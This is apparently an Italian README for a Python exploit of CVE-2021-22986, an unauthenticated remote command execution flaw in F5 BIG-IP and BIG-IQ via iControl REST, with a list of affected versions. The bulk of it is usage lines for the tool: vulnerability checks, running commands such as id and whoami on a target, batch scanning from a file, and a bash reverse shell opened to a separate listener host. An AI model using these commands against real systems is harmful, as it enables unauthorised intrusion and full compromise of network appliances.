
Exploit Python per CVE-2021-22986, che abilita RCE non autenticata su F5 BIG-IP e BIG-IQ tramite iControl REST, con esecuzione di comandi, scansione batch e funzionalità di reverse shell.
Questa vulnerabilità consente ad attaccanti non autenticati con accesso di rete all'interfaccia iControl REST, attraverso l'interfaccia di gestione BIG-IP e gli indirizzi IP self, di eseguire comandi arbitrari di sistema, creare o eliminare file e disabilitare servizi. Questa vulnerabilità può essere sfruttata solo attraverso il control plane e non può essere sfruttata attraverso il data plane. Lo sfruttamento può portare al completo compromesso del sistema. Anche il sistema BIG-IP in modalità Appliance è vulnerabile.
F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164